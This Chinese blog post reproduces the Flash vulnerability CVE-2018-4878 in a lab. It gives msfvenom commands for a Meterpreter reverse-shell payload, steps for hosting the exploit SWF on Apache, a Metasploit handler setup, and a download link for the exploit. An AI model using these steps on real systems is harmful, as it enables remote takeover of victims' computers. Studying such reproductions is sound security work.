美文网首页
CVE-2018-4878 Flash 0day

CVE-2018-4878 Flash 0day

作者: 二潘 | 来源:发表于2018-08-31 16:28 被阅读45次

    1、漏洞概述

    2018年2月1号,Adobe官方发布安全通报(APSA18-01),声明Adobe Flash 28.0.0.137及其之前的版本,存在高危漏洞(CVE-2018-4878)。

    攻击者通过构造特殊的Flash链接,当用户用浏览器/邮件/Office访问此Flash链接时,会被“远程代码执行”,并且直接被getshell。

    直到2018年2月5号,Adboe才发布补丁来修复此0 day漏洞。

    漏洞影响的版本:


    image.png

    2、漏洞的复现

    0x01环境的配置:
    攻击机:Kali 192.168.10.116
    靶机:win7 192.168.10.100
    exp:cve-2018-4878.py
    flash:flashplayer_activex_28.0.0.137.exe

    上面用到的工具都放在网盘里面了:https://pan.baidu.com/s/1dotCoCx0AX8sgUaOqFT9vw 密码:0li0

    1.png

    漏洞的复现是参照大佬的陈鑫杰这篇文章写的

    0x02漏洞的复现
    1、将网盘中的CVE-2018-4878-master目录下载下来,并放入Kali Linux桌面


    2.jpg

    2、使用msfvenom生成shell代码
    生成代码,其中lhost为kali的ip地址,lport为自定义的端口号

     msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.116 lport=8888  -f  python>shellcode.txt 
    
    3.jpg

    3、查看代码文件
    cat shellcode.txt


    4.jpg

    4、进入CVE-2018-4878-master目录,编辑CVE-2018-4878.py文件
    将上面msfvenom生成的代码覆盖掉原来的代码:


    5.jpg

    5、查看当前路径


    6.jpg

    6、修改CVE-2018-4878.py下面的文件信息(后面会用到,之后保存修改退出):


    7.jpg

    7、Kali Linux进入CVE-2018-4878-master路径,用Python执行CVE-2018-4878-master.py代码

    root@kali:~/Desktop/CVE-2018-4878-master# python cve-2018-4878.py
    root@kali:~/Desktop/CVE-2018-4878-master# ls -l 
    
    8.jpg

    8、Kali Linux开启Apache2服务,并将上面的2个文件放入/var/www/html目录中(apache web路径)

    root@kali:~/Desktop/CVE-2018-4878-master# service apache2 start 
    root@kali:~/Desktop/CVE-2018-4878-master# cp index2.html /var/www/html/index2.html 
    root@kali:~/Desktop/CVE-2018-4878-master# cp exploit.swf /var/www/html/exploit.swf 
    
    9.jpg

    此时,Kali Linux上Web服务启动,并且具备index2.html这个页面。只要靶机启用flash并访问了这个页面,则可以直接被控制。
    9、Kali Linux开启Shell会话监听

    使用handler监听模块 
    msf > use exploit/multi/handler 
    回弹一个tcp连接 
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp 
    设置kali渗透机的ip地址 
    msf exploit(handler) > set lhost 192.168.10.116
    设置监听端口,这个需跟上面msfvenom设置的端口一致 
    msf exploit(handler) > set lport 8888 
    开启监听,等待肉鸡上线 
    msf exploit(handler) > exploit
    
    10.png
    10、Windows7 安装flash插件,并用IE浏览器访问页面
    安装flash插件 ,安装flash的时候可能出现让你下载最新版本,可以断网之后进行安装(或者如果是X64操作系统的话,我是win7 x64 就修改注册表里面的内容HKEY_LOCAL_MACHINE/SOFTWARE/wow6432Node/Macromedia/FlashPlayer/SafeVersions)
    11.jpg
    11、使用Win7内置IE 8浏览器访问页面:http://192.168.10.116/index2.html
    12.jpg
    12、Kali Linux 上获取meterpreter shell,并进行管理
    12.jpg
    实验结束

    相关文章

      网友评论

          本文标题:CVE-2018-4878 Flash 0day

          本文链接:https://www.haomeiwen.com/subject/gposwftx.html